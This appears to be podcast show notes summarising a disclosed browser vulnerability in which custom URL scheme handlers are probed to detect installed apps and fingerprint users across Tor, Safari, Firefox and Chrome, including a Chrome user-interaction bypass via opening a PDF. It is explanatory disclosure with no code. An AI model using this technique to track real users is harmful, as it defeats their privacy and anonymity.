Cross-browser tracking vulnerability in Tor, Safari, Chrome and Firefox

We discussed this vulnerability during Episode 77 on 18 May 2021

Kind of a neat attack to track users across browsers. Potentially fairly loud for most users though. The issue stems from all the custom scheme:// handlers applications can register, it make it possible to determine if an application (that registers such a handler) has been installed based on how the browser reacts when trying to open a url with the custom scheme. You can use this to enumerate several applications and create a unique identifier.

For Firefox, Safari and Tor Browser opening the custom schema would result in either an internal error page (when not registered), or an about:blank page (with a prompt to accept opening the application). Same Origin Policy would allow the opener to access the about:blank page but not the error page this could be used to detect whether or not the application was installed. Tor Browser in particular though would hide the prompt, and popups automatically. This allowed for a more silent attack using an iframe.

On Chrome there was some extra protection as you cannot launch an application without user interaction. This could be bypassed by opening a PDF in the page first, opening a PDF disabled the restriction.